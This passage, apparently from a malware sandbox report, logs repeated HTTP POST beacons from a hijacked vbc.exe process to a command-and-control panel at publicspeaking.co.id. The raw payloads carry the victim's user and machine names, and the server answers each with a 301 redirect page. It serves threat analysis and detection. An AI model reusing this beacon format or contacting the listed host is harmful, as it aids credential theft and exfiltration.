                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:53.385363102 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.54981392.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:53.656523943 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:53.776209116 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:55.345941067 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:55 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: acb2f49a32ad91ba0e4aaf13bb500dac-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.345
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:55.345988989 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.54981992.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:55.629004955 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:55.748800039 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:57.219871998 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:57 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 2beb471f51cc97c100be893999be0e8c-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.332
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:57.219886065 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.54982592.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:57.516555071 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:57.639002085 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:59.252799034 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:59 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: fd106a87b5c0fad2ddb702f26db01f42-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.354
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:59.252813101 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.54982892.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:59.533334970 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:59.653023958 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:01.214343071 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:01 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: a64d68f8f077a2ac3a566049130f286a-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.335
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:01.214385986 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.54983492.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:01.487555027 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:01.607261896 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:03.080998898 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:02 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 2ad810210d0eb277c97dfa6d25276551-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.338
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:03.081017017 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.54984192.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:03.365525961 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:03.485305071 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:05.050447941 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:04 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 339f811f39a6de97e7c05579e2df6873-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.334
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:05.050488949 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.54984792.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:05.528803110 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:05.648439884 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:07.230549097 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:07 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 0b336b24ea430dd41ec7cfe87aa730ca-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.358
